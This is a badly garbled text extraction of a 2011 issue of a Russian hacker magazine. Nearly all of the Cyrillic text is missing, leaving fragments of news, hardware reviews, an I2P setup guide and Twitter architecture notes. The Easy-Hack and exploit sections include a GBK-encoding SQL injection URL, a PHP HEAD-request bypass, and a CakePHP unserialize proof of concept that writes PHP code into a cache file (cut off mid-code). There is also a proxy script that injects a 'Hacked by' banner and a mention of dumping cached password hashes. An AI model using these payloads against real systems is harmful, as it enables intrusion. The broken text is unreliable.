82
x 05 (148) 2011
.
210
:
PWN2OWN:
05 (148) 2011
VOIP
5 DVD
VOIP-
PHREAKING /
. 60
PHREAKING
. 130
148
Linux USB-
Red.Button:
Twitter
MS08- 067:
WINDOWS
. 68
INTRO
,
C :
1. Phreaking.
, kumekay
. ,
,
- DIY.
.
2. 90 . , , .
, .
:
? .
: www.xakep.ru/podpiska,
,
(540 , 1080 ).
. ,
,
.
3.
. , ,
,
, .
,
- . ,
Eset.
4. ,
- : 150- .
,
-, 27 , .
www.xakep.ru/150x.
nikitozz, . .
http://vkontakte.ru/xakep_mag
Content
MegaNews
004
Ferrum
016
PC_Zone
022
026
I2P
: Google Cloud
Microsoft Office
028
140
033
034
Twitter ?
TeamViewer
13
038
Microsoft
082
086
Easy-Hack
046
052
, ,
!
partypoker.com
058
client-side
060
VoIP!
064
2004 , ?
VoIP-
Red.Button
068
60
072
X-Tools
Windows
MALWARE
074
078
free- Avast, Avira, AVG, Comodo, ClamAV
SEO
BlackHat SEO
090
096
102
Windows
Linux
106
110
, Rogue AP,
042
Positive Technologies
iOS, Android, Bada, Symbian WM
Wi-Fi
Pwn2Own:
114
AirPlaySDK
memory leaks
SYN/ACK
118
122
127
SaaS
ERP -
-?
PHREAKING
130
134
Arduino
555
5 555
140
143
144
FAQ UNITED
FAQ
8.5
WWW2
web-
022
I2P
130
060
VoIP-
VoIP!
Phreaking
>
nikitozz
(nikitoz@real.xakep.ru)
>
gorl
(gorlum@real.xakep.ru)
>
Forb
(forb@real.xakep.ru)
PC_ZONE UNITS
step
(step@real.xakep.ru)
, MALWARE SYN/ACK
Dr. Klouniz
(alexander@real.xakep.ru)
UNIXOID PSYCHO
Andrushock
(andrushock@real.xakep.ru)
PHREAKING
kumekay
(po@kumekay.com)
>
> DVD
Step
(step@real.xakep.ru)
Unix-
Ant
(antitster@gmail.com)
Security-
D1g1
(evdokimovds@gmail.com)
> xakep.ru
(xa@real.xakep.ru)
/ART
>
(olgaeml@glc.ru)
(alekhina@glc.ru)
>-
>
>
(polikarpova@glc.ru)
>
(maligina@glc.ru)
/PUBLISHING
>
( )
(strekneva@glc.ru)
>
>
> -
(alekseeva@glc.ru)
> MAN TV
>
, 115280, , . ,19, , 5 , 21
.: (495) 935-7034, : (495) 545-0906
>
>
>.
>
>
>
>
>
>
> TECHNOLOGY
(komleva@glc.ru)
>
>
>
(kosheleva@glc.ru)
>
>
> :
-
DVD-: claim@glc.ru.
>
: (495) 545-09-06
: (495) 663-82-77
: 8-800-200-3-999
>
101000, , , / 652,
,
77-11802 14.02.2002
Zapolex,
.
190 874 .
.
. ,
,
.
.
.
:
content@glc.ru
, , 2011
MEGANEWS
Mifrill (mifrill@real.xakep.ru)
Meganews
SCADA-
,
Stuxnet, , ,
. ,
, Stuxnet, - . Stuxnet (
Symantec) ,
, ,
. , ,
. , Ottawa Sun,
,
. 2011
, SCADA-. , SCADA
Supervisory Control And Data Acquisition, : .
, , , . - Agora SCADA+
Gleg,
DDoS-.
0day-. -
. ,
: Siemens Tecnomatix
FactoryLink, Iconics GENESIS, 7-Technologies IGSS DATAC RealWin.
Gleg, ,
, , SCADA-
, . ,
. ,
, . Proof-of-concept
seclists.org/bugtraq/2011/Mar/187.
! ICANN
.xxx . ,
$60. 200 000 .
, .
NEC. ,
HS100-10, .
IT ,
. :
, ,
- , , . ,
. NEC .
HS100-10 , ,
. ,
.
,
. HS100-10 USB .
, , ,
.
SONY
Sony vs
GeoHot, . ,
graf_chokolo,
PlayStation
3 . Sony
(
), ,
, ,
, PS3.
, ,
HV Bible.
, ,
. Sony
,
,
graf_chokolo :
, .
, , ,
Sony. , .
, .
Sony. ,
(
16-20 000). ,
(grafchokolo.com).
3.60, ,
. ,
Winocm,
YouTube,
.
, Winocm Sony,
.
, MySpace , .
comScore ,
: 73 63 000 000.
RUSTOCK ,
,
. :
Microsoft
, 2006 Rustock.
.
,
192 - .
150 000 2 400 000. ,
, , Rustock - . b107.
Microsoft Digital Crimes Unit
,
, , Rustock. Microsoft,
Microsoft ,
, ,
. -, . :
33.6%. -,
- ,
, , Rustock 13 820 000 000
. , . Bagle
Festi, .
8 310 000 000 4 200 000 000
, . Bagle, ,
22%
.
, .
, .
,
. , -
,
, .
WirelessHD, WHDi, Intel WiDi .
, ,
,
. Fujitsu
CeBIT SUPA (Smart
Universal Power Access).
. . Fujitsu
22- , -:
.
.
(
25 ),
. CeBIT
,
. ,
, USB ,
.
Fujitsu .
, ? :)
Samsung,
CeBIT -
. VA- 46
1920 x 1080 -
.
.
. ,
Samsung
.
!
Windows 7 Windows Server
2008 R2.
,
SYN/ACK UNIXOID. ,
,
,
, ,
Windows UNIX, , .
Active Directory
,
Windows. Windows 7 Windows Server 2008 R2 100%
,
, ,
IT-.
GH0STMARKET.NET
Gh0stMarket.net. .
, ,
,
, .
, . , GhostMarket
,
, - .
,
8 000 .
GhostMarket 65 000 ,
$25 000 000.
. ,
.
. : 19- , 18- 21- . , .
, ,
. ,
, .
,
, .
.
, , ,
.
LTE-
- ,
LTE-
. (Yota),
-
,
(, , , ) .
:
180 (
$2 000 000 000),
LTE-
. 2014
.
,
, , ,
. , ,
. ,
30-40 ( ) 2.5-2.7. , ,
, , Yota
, , ,
.
--
,
,
Facebook. - Color - App Store
Android Market,
.
. ,
, , (
Color).
,
.
,
Sequoia Capital, Bain Capital
Silicon Valley Bank Color
$41 000 000. ,
.
, .
SSL-
SSL, Comodo
- (mail.google.com, google.com, login.yahoo.com,
login.skype.com, addons.mozilla.org, login.live.com). 15-
CEO ,
, ,
, ,
. ,
IP,
, SSL-.
SSL- Google, Skype, Microsoft, Mozilla Yahoo. -
, , login.skype.com, ,
. , pastebin.com/74KXCaEZ
-,
. , Janam Fadaye
Rahbar (
), ,
, 21-
, .
, ,
. ,
Comodo InstantSSL.it. ,
TrustDll.dll, C#.
,
API Comodo, , . ,
,
. . , (, TrustDLL),
, Mozilla addons.
,
, .
QIWI
, , ( )
.
Trojan.PWS.OSMP. ,
Qiwi.
Windows :
maratl.exe, ,
,
. .
USB-, ( ).
(
, -, Delphi) BackDoor.
Pushnik,
. ,
,
( ),
Trojan.PWS.OSMP .
Qiwi ,
, Dr.Web
,
.
, ,
,
.
EDIFIER
Edifier
.
Edifier :
.
, Edifier
. ,
S330D,
S330,
.
2.1 ,
,
. Edifier , S330D
. , S330D
.
.
AUX-,
.
72 .
20 20 000 .
S330D
, (Xbox, Sony PlayStation)
. , Edifier
S530D S730D, .
ZEUS
ZeuS,
. ,
malware ZeuS SpyEye.
. , SpyEye,
, ZeuS,
. ,
, .
: .
,
.
,
, ,
. :
ZeuS,
, ,
, . , :
.
,
.
IOO Jabber
ICQ
, .
: ,
ZeuS
, .
-
,
.
.
- ,
, ,
Allofmp3 Rutracker.
, , (
,
)
-.
:
.
, , , .
.
TFT-
Wexler WEXLER.BOOK T7002.
, 7.0 TFT- LED .
,
. (
),
. ,
, E-ink,
. Wexler, ,
.
(ansi, txt, pdf, html,
fb2, pdb, epub), /
(mp3, wma, flac, AAC), (wmv, rm, avi,
rmvb, 3gp, flv, mp4, mpeg, mkv) (jpeg, bmp, gif). ,
:). , ,
LCD-
. TFT- WEXLER.BOOK
T7002 .
7 ,
5 , ( )
30 .
4 ,
200 000 .
20
MicroSD.
mini-USB , . WEXLER.BOOK T7002
.
: , , , , , .
. , , :
4 599 .
NOKIA X1-00: 61
Nokia.
. X1-00
Series 30
,
,
. Nokia
,
1320 61 (!) . , ,
,
?
mp3-.
,
, FM-,
microSD ( 16
).
.
,
, ,
,
. , X1-00
35. Nokia
,
,
(
).
.
,
-.
FERRUM
:
: Intel Core 2 Duo E4700, 3500
: ASUS P5QC
: 2x1024 , Kingston
DDR2, 800
: NVIDIA GeForce 9800 GT
: 430 , Thermaltake
: Microsoft Windows 7
Ultimate x32
1
,
,
. , , .
-
. .
99%
,
. , ,
( ,
) , .
, , , ,
! ,
MTBF, , .
. , ,
SATA
3.0, ,
, . ,
HDD ( )
SATA III,
. ,
. 7200 ,
5400
, . , ,
,
, ,
. .
, -,
.
32 (16 ),
64 . ,
RAID-,
,
RAID-, .
, . , - ,
, , .
. , AIDA64
( Lavalys Everest),
.
. , HD Tune
Pro , .
4000 .
3400 .
Hitachi Deskstar
7K2000
HDS722020ALA330
Hitachi Ultrastar
A7K2000
HUA722010CLA330
: 2
: SATA II
: 32
: 7 200 /
: 29
: 0.74
: 1
: SATA II
: 32
: 7 200 /
: 24
: 0.68
, :
. ,
( ), -
.
,
, , Ultrastar A7K2000
. , ,
. , ,
.
3000 .
3200 .
SAMSUNG
HD204UI
Seagate Barracuda
Green ST31500541AS
: 2
: SATA II
: 32
: 5 400 /
: 29
: 0.65
: 1.5
: SATA II
: 32
: 5 900 /
: 26
: 0.655
, Samsung
5 400 , ,
, .
,
/.
, 32 ,
. ,
, ,
.
, ,
. Seagate Barracuda
Green ST31500541AS Samsung HD204UI. ,
. ,
. , ( )
. ,
.
,
.
. , ,
.
8400 .
5400 .
Western Digital
Caviar Green
WD30EZRS
Western Digital
Caviar Black
WD2001FASS
: 3
: SATA 3.0
: 64
: 5400-7200 /
: 25
: 0.73
: 2
: SATA II
: 64
: 7 200 /
: 30
: 0.75
: 3
SATA 3.0. RAID- ,
.
WD Green ,
. , ,
64 .
, , . ,
? . Western Digital Caviar Black :
. ,
-,
, .
, :
,
. : , ,
RAID-. ,
,
.
, (, , ,
): .
[Chart: HD Tune Pro, Access time read/write; series: Write, Read]
, . ,
. Samsung
HD204UI, , Western Digital Caviar
Black WD2001FASS, .
, , , HDD. z
PC_ZONE
I2P
.
, . , ,
,
, I2P.
I2P vs Tor
, I2P?
, IP . I2P
peer-to-peer ,
. I2P , . .
Tor. , , I2P,
.
, I2P Tor, -
,
. ,
. Tor
, I2P
, .
- ( ,
,
), .
-,
I2P eepsites. -
Hidden Services,
( HTTP). I2P
Base 32 Names
.onion Tor.
516- ( )
raw-. SHA256 Base32.
.b32.i2p.
? .
www.i2p2.i2p, :
I2P
Tor, I2P . ,
, .
I2P DNS-, - DHT (Distributed Hash Table),
Kademlia. .
, 2007 Tor. , I2P , . ,
I2P
, NetDB.
, , , ,
-
.
I2P
IP,
,
, . , www.i2p2.i2p (
I2P) :
-KR6qyfPWXoN~F3UzzYSMIsaRy4udcRkHu2Dx9syXSz
[... ...]
e9NYkIqvrKvUAt1i55we0Nkt6xlEdhBqg6xXOyIAAAA
,
516 Base64. , .
rjxwbsw4zjhv4zsplma6jmf5nr24e4ymvvbycd3swgiinbvg7oga.b32.i2p
. I2P
- DNS-,
( <somename>.i2p ), . I2P
, .
HOSTS.
,
I2P.
, ,
.
I2P . Tor
, I2P
(in) (out) . ,
.
(, ),
.
,
.
I2P (Garlic routing). , ,
( )
.
, -
DVD
dvd
,
,
.
INFO
info
I2P- ?
: https://
www.awxcnx.de/
cgi-bin/proxy2/nphproxy.cgi/000000A/
http/< >
P2P- I2P
, .
, ,
, .
.
, I2P. :
IRC, BitTorrent, eDonkey, Email.
I2P API
, ,
I2P-.
,
. I2P Java,
Java-.
, .
.
-, 127.0.0.1:7657/index.jsp. .
I2P
( ), HTTP-: 127.0.0.1:4444. . .
, I2P ,
. , I2P, eepsite. ,
,
I2P
. ( ,
) IP-
. step-by-step
I2P.
1. 127.0.0.1:7658,
-. eepsite,
. , ~/.i2p/eepsite/docroot/ (Linux) %APPDATA%\I2P\
eepsite\docroot\ (Windows). Jetty, I2P:
7658 . , .
, I2P .
2. , .
(127.0.0.1:7657/i2ptunnel),
I2P- I2P
webserver , . . . ,
, (local
destination) , -
F94tTd-vSO7C0v~4wudVsaYV[.. ...]AAAA.
Base64 ,
I2P-. - IP-.
-
.
Base32- ( ) Python- ( ).
,
zeky7b4hp3hscdwovgb2vtdbvltsvpf24ushype5uoigu42p3v5q.b32.i2p.
, , . ,
, .
3. DNS I2P , . eepsite
(something.i2p). ,
- , :
127.0.0.1:7657/susidns/addressbook.jsp?book=router&filter=none.
,
mysite.i2p
(, xa31337xa.i2p).
,
I2P.
4. ! .
eepsite . , , ,
. ,
eepsite. !
- Base32, .
I2P, - . ,
: 127.0.0.1:4444. ,
, .
( outproxy). , , -
. , I2P .
,
VPN/Tor/SSH-. I2P , , .
Base64 Base32
I2P
DNS
5. , .
, -
127.0.0.1:7657/susidns/addressbook.jsp?book=master.
,
, , .
6. eepsite stats.i2p.
, . (516 Base64).
Submit. ? ,
. (
) xa31337xa.i2p.
, DNS-. , ,
Base32- : stats.i2p/cgi-bin/jump.cgi?a=xa31337xa.i2p.
- ,
wiki ugha.i2p/eepsiteIndex
forum.i2p.
7. , ,
.
. , ,
: .
127.0.0.1:80, , ,
92.241.175.142:80 ( ip- xakep.ru).
SSH-
- I2P
.
SSH-,
, eepsite. .
1. , I2P
. SSH-.
, -
: , (
inproxy.tino.i2p/status.php
eepsite,
;
tracker2.postman.i2p exotrack.i2p BitTorrent;
hashparty.i2p (LM, MD5, MYSQLSHA1, NTLM, SHA1 );
redzara.i2p dumpteam.i2p
192.168.1.1:22).
, .
(Base32)
.
2. , , ,
SSH- (, PuTTY). . I2P .
SOCKS, , ,
. , , , I2P,
,
I2P- SOCKS 4/4a/5. , , ( 5454).
3. , . PuTTY, , . Connection Proxy
Proxy proxyname ,
SOCKS- 127.0.0.1:5454. DNS name
lookup Yes Auto.
4. . , I2P SSH.
, -, .
:
I2P 100% eepsite?.
: . , ,
, I2P.
-. ,
IP- .
. ,
Irongeek (irongeek.com)
,
BlackHat 2011 DC. z
PC_ZONE
Step (twitter.com/stepah)
:
GOOGLE CLOUD
MICROSOFT OFFICE
:
Microsoft Office - Google Docs.
.
,
.
!
,
Microsoft Office.
Cloud Connect
OpenOffice, -
Microsoft. ,
-.
Google Docs. ][
, .
,
,
. EtherPad
Docs . ,
, .
,
. .
Google Docs ,
, ,
. ,
Office .
, ,
? .
, Office
,
Google Docs. , , .
OffiSync (www.offisync.com). Microsoft Word, PowerPoint Excel
,
Google. ?
,
. Google Docs , .
, ,
( ) .
, OffiSync
Google Docs ( ).
, ,
, , . , -
, OffiSync
(merge). , .
:
Google? , :).
DocVerse,
Office
2007, Google Docs.
- Microsoft $25 000 000. , Google Cloud Connect
for Microsoft Office (tools.google.com/dlpage/cloudconnect)
. OffiSync, ,
. ,
Microsoft Word, PowerPoint
Excel, . Cloud Connect ,
. : ,
.
, , .
: - , .
, Microsoft
SkyDrive (skydrive.live.com) - Office Web
Apps (office.microsoft.com/ru-ru/web-app). ,
Microsoft Office. ,
Windows Live Mesh. z
PC_ZONE
(insight-i t.ru)
140
Twitter ?
, ,
, . 5 .
? 140 @ #. Twitter-
( follower).
, -,
175 000 000 .
Twitter Odeo,
.
. , ,
?. 140 000 000
Twitter .
.
Twitter
- , - (
, ). ,
25% -, API.
: , , 182%.
: 6 000 000 000 API ,
70 000 !
HTTP, .
[Diagram: Twitter architecture. Labels: Web, API, Load Balancers, Apache mod_proxy, Rails (Unicorn), Flock, Kestrel, memcached, MySQL, Cassandra, Daemons; 25%, 75%]
Links: insightit.ru/highload
- API
Ruby on Rails,
Ruby Scala. , Ruby
on Rails ,
Twitter ,
10-20% ,
RoR
.
, ,
. , NTT America,
.
:
,
.
Apache
httpd, ,
Ruby.
Unicorn,
, ,
( 30% )
.
Apache + Unicorn . :
( ), ActiveRecord, SQL- Ruby, ,
,
.
.
, ,
. Twitter, memcached,
Segmentation Fault ( ). ,
TTL ( ), .
. . Twitter memcached
Ruby libmemcached FNV Ruby md5.
,
. , .
, - ( , :
).
memcached,
.
, ,
Twitter
,
. . MySQL.
,
.
: ,
, .
.
FlockDB , MySQL.
Gizzard.
,
. .
Twitter 13 000 000 000 ,
20 000 100 000 -
3 , 2 1 Twitter,
.
.
460 000 .
6 939 TPS (
), 4
.
[Diagram: FlockDB. Labels: Flock, Gizzard, MySQL; 100 000]
.
FlockDB :
: 1
: 2
: 1 , 16
: 100 /
Twitter :
15-25 , 12 .
. ,
80
, 12 48 .
.
.
Java-
Apache Hadoop ,
,
. Hadoop
. ,
MapReduce. ,
,
. HDFS
(Hadoop Distributed File System),
,
. .
Hadoop
Google File System (GFS).
, HDFS ,
MapReduce ,
- Java. ,
Hadoop Twitter:
, ( ,
5 12 000 000 000 ),
PageRank .
MapReduce,
Java, .
Twitter OAuth
Twitter
- , opensource
.
:
- .
- ,
, ,
opensource. Cassandra Scribe, ,
Facebook,
Twitter.
Twitter
, , ,
:
Loony , Python, Django, MySQL
Paramiko ( SSH Python).
LDAP, .
Murder ,
BitTorrent. P2P-
30-60 .
Kestrel , Scala
memcache. ,
: set ( ) get (
).
.
, . , Twitter
Pig, , Hadoop.
,
.
SQL, , 20
,
MapReduce-.
Twitter Pig. Hadoop Twitter ,
. opensource HBase,
Google BigTable. , HDFS,
.
, ,
, ,
-
, .
,
, .
syslog-ng, . : Facebook,
, Scribe,
opensource Twitter.
.
. Scribe
.
, ,
.
, HDFS (
).
Twitter , 30 .
Facebook, .
. Twitter ,
-:
;
;
.
,
,
.
( ), ,
. , . , :
?
.
:
, ,
.
Twitter , . ?
Rails (HTTP 500), ,
. ? HTTP- 502
503, 5 ( - ,
),
(mkill).
.
bash-, 60 ,
/ , .
Twitter
,
- .
- - .
,
. ,
:).
Twitter
?
1. ,
.
2.
.
3. , . , ,
-
, .
4. memcached
.
5.
,
.
6. .
Twitter . , API . ,
. ,
. -, ,
.
, . z
PC_ZONE
Step (twitter.com/stepah)
TeamViewer
TeamViewer.
,
, NAT.
IP
, RDP
VNC . -
TeamViewer
: NAT, .
.
.
, IP-,
, ,
, .
TeamViewer -.
.
.
.
,
.
, ,
TeamViewer.
KeepAlive. TeamViewer
,
.
,
100 000 000
.
!
QuickSupport
.
- ,
.
.
. ,
,
.
. ?.
. ,
,
-.
.
,
MacBook.
,
Windows, Mac OS X
Linux. -
: RPM,
deb, tar.gz. , () TeamViewer
,
. ,
.
.
.
.
Android iOS (
iPhone iPad).
,
( ,
),
.
3G
, . - ActiveX Java.
, TeamViewer
, -
( , , ,
). TeamViewer
Web Connector login.teamviewer.com.
HTML/Flash ActiveX
Java,
. . TeamViewer?
,
NAT. : TeamViewer
Windows, Linux, Mac.
.
.
.
!
, ,
-
(xakep.ru/magazine/xa/116/032/1.asp) z
ID TeamViewer
PC_ZONE
Step (twitter.com/stepah)
13
Microsoft
? , , , . Microsoft
,
, .
Microsoft ,
. .
, 40 (!) . Microsoft , 2004
SDL (Security Development Lifecycle).
, SDL , , . SDL, Microsoft
, .
, ,
.
SDL
.
Microsoft . ,
,
. , ,
. ,
, .
,
.
/
BinScope Binary Analyzer
DEP ASLR.
,
.
, SDL,
:
DEP, ASLR.
/NXCOMPAT /DYNAMICBASE. , Binscope SDL
,
SDL. ,
SDL
/,
.
Binscope
, ( , ).
AppVerifier
Application Verifier , native ,
.
,
( runtime). AppVerif , ,
. ,
API, .
40
FxCop
.
, .NET
.NET
Framework. , ,
. FxCop
CIL ( ,
Microsoft .NET) .
INFO
info
Secure
Lifecycle Development:
microsoft.com/
security/sdl.
banned.h
C/C++,
, buffer
overflow .
: (xstrcpy(), strcat(),
gets(), sprintf(), printf(), snprintf(), syslog()), (access(), chown(), chgrp(), chmod(), tmpfile(), tmpnam(),
tempnam(), mktemp()),
(exec(), system(), popen()). ( )
. ,
, ,
(, ,
SDL).
SDL, ( ) ,
. Minifuzz File Fuzzer
, ,
.
,
.
PC_ZONE
Step (twitter.com/stepah)
, Rogue AP,
Wi-Fi
. -
3G- WiMax- .
- (Rogue AP) , , . ,
!
3G-
.
USB-, -
. , ,
.
netsh
,
3G-, , Wi-Fi
.
,
,
Windows-.
Windows
7 Windows 2008 Server R2.
.
, Wireless Hosted Network (
). , , ,
.
4
1. .
, .
,
USB 3G-
. , MAC,
.
2.
.
,
. ,
Wi-Fi (
Connectify Clone Wi-Fi Settings).
.
HTTP://WWW
links
Wireless Hosted
Network:
http://goo.gl/3p7Gq;
MSDN:
http://goo.gl/6qp2y;
,
:
http://goo.gl/yfYuf.
3. Rogue AP .
,
.
Wireshark, 0x4553Intercepter Network Miner .
USB- ,
( ,
) .
4. .
,
VPN-.
- OpenVPN Tor.
,
.
, .
,
),
3G-, WiMax- ethernet-.
Wireless Hosted Network . , (, ,
)
Wireless Hosted Network,
-. ,
, Windows 7.
,
.
, ,
, - , ,
Wireless Hosted Network. . Microsoft, ,
,
: ,
API- (
MSDN),
netsh (network shell). Netsh.exe
, .
.
, netsh
wlan /?. , .
, :
#
netsh wlan start|stop hostednetwork
#
netsh wlan set hostednetwork [mode=]allow|disallow
# , SSID,
# , (/)
netsh wlan set hostednetwork [ssid=]<ssid> [key=]<passphrase> [keyUsage=]persistent|temporary
#
netsh wlan refresh hostednetwork [data=] key
# ,
# ( )
netsh wlan show hostednetwork [[setting=]security]
#
netsh wlan show settings
, : ,
Wireless Hosted Network,
,
Virtual WiFi. : Asus
Intel 3945ABG WLAN-
.
,
. .
1.
netsh.exe :
netsh wlan set hostednetwork mode=allow ssid="Virtual Hostpot" key="pass pass pass" keyUsage=persistent
3. , , .
- , -.
,
, ,
.
,
, , Wireless Hosted Network
.
Internet Connection Sharing (ICS).
IP- ( DHCP-),
NAT (Network address
translation).
, !
, ,
.
: ( )
. . ,
, MSDN Wireless
Hosted Network
.
: Virtual Router (virtualrouter.codeplex.com)
Connectify (connectify.me).
GUI- ,
,
.
SSID :
. Virtual Router ,
(
Virtual Router
Ubuntu
Linux, Windows, . ,
, : wireless.kernel.org.
, .
Ad-Hoc Mode Working . ,
wiki:
help.ubuntu.ru/wiki/wifi_ap.
Mac OS X
Mac OS X
Infrastructure, , .
,
MacBook
, .
: bit.ly/macbook_hotspot.
Connectify
API- ).
, netsh.
Connectify .
,
,
. .
, Wireless
Hosted Network WPA2-PSK/AES:
, .
, (, ).
, Connectify UPnP-
VPN- ( OpenVPN). -
. , ,
. . z
GreenDog , DSecRG.ru, Digital Security (agrrrdog@gmail.com)
Easy Hack
1
:
NOTEPAD++.
:
:).
, - .
/ ,
. nix ,
. , *nix grep gawk (gnu.org/software),
.
Notepad++. , .
, , Cain ,
/.
Notepad++: / , .
, regexp :
1)^.*:\s
2)\r\n :
3) :--------------------- \r\n
, Notepad++ regexp
, .
. (
),
, .
- .
Cain .
<Home>, <End>.
shortcuts.xml. Notepad++, %APPDATA%
. .
, , : notepad-plus-plus.ru/uploads/cod.zip.
:
, PROCESS
MONITOR.
:
Sysinternal, . (sysinternals.com) .
:
( :) ).
,
- , Process Monitor
(procmon.exe).
. ,
, ,
. , Notepad++ , shortcuts.xml.
:
1.
2.
3.
4.
/ , ,
(, ),
. Tools File Summary, (. ).
, . !
, .
- .
. shortcuts.xml
Notepad++ Procmon.
Procmon: Process name is notepad++.exe
Notepad++.
.
:
-.
:
, , FireFox
. .
,
FoxyProxy. FoxyProxy
-. , , -
, . ,
.
, , ,
, . , :).
, .
.
:
HTTP(S)- WEBSCRAB.
if (bytes != null) {
String content = new String(bytes);
content="<h1>Hacked by GreenDog<h1>"+content;
response.setContent(content.getBytes());
}
:
, , -
(Base64) http,
.
webscrab.
- , . Webscrab -
/,
. OWASP (owasp.org/index.php/Category:OWASP_WebScarab_Project). webscrab
. .
webscrab Kuzya forum.antichat.ru/showthread.php?t=106452.
.
webscrab (127.0.0.1:8008, ),
, webscrab
, , realm (
) Tools Credentials. !
- ,
webscrab http/.
.
Tools User full-featured
interface, Proxy Bean Shell. Enabled. Commit.
, Bean. Bean Shell
Java. ,
. beanshell.org/manual/bshmanual.html.
:
return response;
}
.
, 1 URL testphp.vulnweb.com www.ya.ru (
Acunetix :) ).
URL URL
.
2 ,
( ), .
3 ,
, , ,
. . .
,
- . / :
owasp.org/index.php/How_to_modify_proxied_conversations.
bean shell.
-webscrab (Tools
Proxies). -webscrab, bean shell <> webscrab
<> .
yandex? :)
: :).
:
, ,
. .
:). , -, ,
- . , - YEHG GoogleHacker (yehg.net/lab/pr0js/files.php/googlehacker.zip).
. , ,
html , .
.
:
, , SQL-
. OWASPa.
][ , (
).
PHP MySQL
web-. , PHP
MySQL.
- , SQL- .
- . mysql_real_
escape_string ( real), addslashes. ,
, , .
: addslashes (
/) (0x27)
(0x22) , (0x5c) null- (0x00). , .
.
?
SJIS, BIG5, GBK, CP932.
, UTF. -
:
WINDOWS-.
:
win-, .
, ( cmd.exe)
: , nix.
. - ,
doskey. alias . Doskey
/
, .
Windows.
, ,
:)
MySQL 4.1.-4.1.20, 5.0.x-5.0.22 PHP < 5.2.5
, ,
, .
, . GBK,
, 0xbf27 ,
. 0xbf5c . addslashes:
, . 0xbf , 0x27
, .
0xbf5c27 (\'), MySQL
0xbf5c 027, - .
SQL- :
http://test.com/Vuln.php?id=%bf%27 OR 1=1 /*
, mysql_escape_string
,
. :
shiflett.org/blog/2006/jan/addslashes-versus-mysql-realescape-string;
ilia.ws/archives/103-mysql_real_escape_string-versusPrepared-Statements.html;
kuza55.blogspot.com/2007/06/mysql-injection-encodingattacks.html;
raz0r.name/vulnerabilities/sql-inekcii-svyazannye-smultibajtovymi-kodirovkami-i-addslashes.
, :
windowsfaq.ru/content/view/203/1,
Microsoft.
1. Doskey /history
2. Doskey ls=dir $*
3. Doskey /exename=ftp.exe go=open 192.168.2.101$tmget *.TXT c:\reports$bye
:
1. .
2. dir
( $*).
3. ftp.exe. , go
ftp, 192.168.2.101,
. $t (open, mget, bye). ,
,
cmd.exe.
1. :
doskey /macros > stdmacs
"C:\Windows\system32\cmd.exe" 1
nircmd.exe win trans title \
"C:\Windows\system32\cmd.exe" 100
4.
:
2. :
doskey /macrofile=stdmacs
, . : F7/F9,
.
. -
Nirsoft. , , , -
:). Nirsoft nircmdc.
: nirsoft.net/utils/nircmd.html. , (
) .
, 34
, , ,
, , . , , ,
.
- meterpreter, , .
,
. ,
(. ).
1. :
, , .
nircmd.exe
2. (. ):
nircmdc.exe trayballoon "Yo man!" "You are powned!" \
"shell32.dll,-15" 10000
3. :
nircmd.exe win settopmost title \
nircmd
: MSCASH-
MSCache2 , Vista:
hash = PBKDF2_SHA( MD4 (MD4(user password) +
lowercase(username)), iterations )
:
, , , ,
. windows-
10 ,
10 .
. ,
,
, . , .
,
. , NTLM-,
SAM LSA, MSCache-.
MSCache. .
Windows 2000-2003:
hash = MD4 ( MD4(user password) + lowercase(user name) )
iterations 10240.
: passcape.com/index.php?section=docsys&cmd=details&id=8.
MSCache, MSCache2 , , , john the ripper jumbo-.
, , .
. ,
, fgdump. ,
, .
, , . .
meterpreter. ,
mediaservice.net .
: lab.mediaservice.net/code/cachedump.rb. z
(icq 884888, snipper.ru)
. , advisory ,
PoC-.
,
.
01
PHP
HTTP HEAD-
BRIEF
3
PHP,
HEAD-. HTTP HEAD
method trick in php scripts.
PHP-, ,
,
- ( ). ,
GET, POST, PUT.
, HTTP-
, HEAD. - PHP
.
: ./main/SAPI.c, 315:
if (SG(request_info).request_method &&
!strcmp(SG(request_info).request_method, "HEAD"))
{
SG(request_info).headers_only = 1;
...
- , php_ub_
body_write.
main/output.c, 699:
zend_bailout();
}
,
HEAD zend_bailout .
EXPLOIT
.
, , -
:
<?php
$line='Nick: '.htmlspecialchars
($_POST['nick']).'<br />
Text: '.htmlspecialchars
($_POST['text']).'<hr />';
$f=fopen("book.txt","r");
$data=fread($f,filesize("book.txt"));
fclose($f);
$f=fopen("book.txt","w");
$data=$line.$data;
echo $data;
fwrite($f,$data);
fclose($f);
?>
HEAD:
if (SG(request_info).headers_only) {
if(SG(headers_sent))
{
return 0;
}
php_header(TSRMLS_C);
<?php
stream_context_get_default
(array('http'=>array('method'=>"HEAD")));
print_r(get_headers('http://site.com/guestbook.php'));
?>
HEAD-
,
echo $data;, book.txt
- .
.
:
<?php
session_start();
echo 'A long string contains about 4090 characters';
$_SESSION['admin']=1;
if (!isset($_POST['pass']) ||
$_POST['pass']!='somepassword')
{
echo '<b>Wrong or empty password.</b><br>';
$_SESSION['admin_level']=0;
}
advisory HEAD-
PHP
?>
. , ,
.
HEAD, echo,
, . ,
-
4096 ,
'A long string contains about 4090 characters'.
EXPLOIT
PHP <= 5.3.5
SOLUTION
PHP
5.3.5. , ,
HEAD.
02
CAKEPHP
BRIEF
CakePHP ( 7 000 000
) -, PHP .
CakePHP -- (MVC).
Ruby on Rails,
:
;
;
(PEAR::DB, ADOdb
Cake);
(PostgreSQL, MySQL, SQLite, Oracle).
,
.
felix
,
unserialize ( ).
./libs/controller/components/
security.php , XSRF POST-:
<?php
function _validatePost(&$controller)
{
...
$check = $controller->data;
$token = urldecode($check['_Token']['fields']);
if (strpos($token, ':')) {
list($token, $locked) = explode(':', $token, 2);
}
$locked = unserialize(str_rot13($locked));
...
?>
CMS, CakePHP
.
,
__load App:
CakePHP
$check POST-,
$locked str_rot13()
,
.
,
][, , PHP.
, PHP 5 : . __construct,
__destruct.
unserialize() __
destruct-, .
PHP, - unserialize (
advisory suspekt.org/downloads/POC2009-ShockingNewsInPHPExploitation.pdf).
App- ./libs/configure.php:
function __destruct()
{
if ($this->__cache)
{
$core = App::core('cake');
unset($this->__paths[rtrim($core[0], DS)]);
Cache::write('dir_map', array_filter($this->__paths),
'_cake_core_');
Cache::write('file_map', array_filter($this->__map),
'_cake_core_');
Cache::write('object_map', $this->__objects,
'_cake_core_');
}
}
,
Cache.
file_map. PHP-,
<?php
...
if (file_exists($file)) {
if (!$this->return) {
require($file);
$this->__loaded[$file] = true;
}
return true;
...
?>
! $file
PHP-!
Remote File Inclusion ,
. LFI- , CakePHP
,
.
EXPLOIT
PoC
felix :
<?php
$x=new App();
$x->__cache=1;
$x->__map=array("Core" => array(
"Router" => "../tmp/cache/persistent/cake_core_file_map"),
"Foo" => "<? phpinfo(); exit(); ?>");
$x->__paths=array();
